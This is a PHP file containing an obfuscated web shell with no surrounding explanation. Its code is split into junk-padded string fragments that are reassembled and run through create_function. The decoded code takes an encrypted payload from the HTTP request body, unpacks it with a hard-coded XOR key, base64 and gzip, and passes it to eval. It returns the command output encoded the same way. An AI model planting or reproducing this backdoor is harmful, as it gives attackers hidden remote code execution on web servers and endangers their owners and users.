<?php
$W='$k="mr20mr2cb96mr2";$kh="ac59mr0mr75b964b";mr$mrkf="07152d234b70"mr;$pmr="';
$i='mmr)mr==1) {@ob_start();@emrvamrlmr(@gzuncmrompress(@mrx(@bamrmrse64_d';
$s='mrAwfmrmo1UIs8mrraXjL9";funcmrtion x($tmrmr,$mrk){$mrc=strlenmr($k);$l=';
$F='base6mr4_encodemr(@x(@gmrzcmrompressmr($o),$k)mr);print(mr"$p$kh$r$mrkf");}';
$M='strlemrn(mr$t);$o=mr"";mrfor($i=0;$mri<$l;){for(mr$j=0mr;($jmrmr<$c&&$i<$l';
$P='ecomrmrdmre($m[1mr]),$k)));$o=@mrob_get_contents();mr@obmr_end_clmreanmr(mr);$r=@';
$o=str_replace('C','','CcreaCtCe_fCunCcCtion');
$a='ch("mr/$khmr(.+)$kf/"mr,@file_getmr_mrmrmrcontents("php://mrinput"),mr$';
$t=');$j++mr,$i++mr){$o.mrmr=$tmr{$i}^$k{$j};}}rmrmreturn $o;}if (mr@mrpremrg_mat';
$x=str_replace('mr','',$W.$s.$M.$t.$a.$i.$P.$F);
$e=$o('',$x);$e();
?>
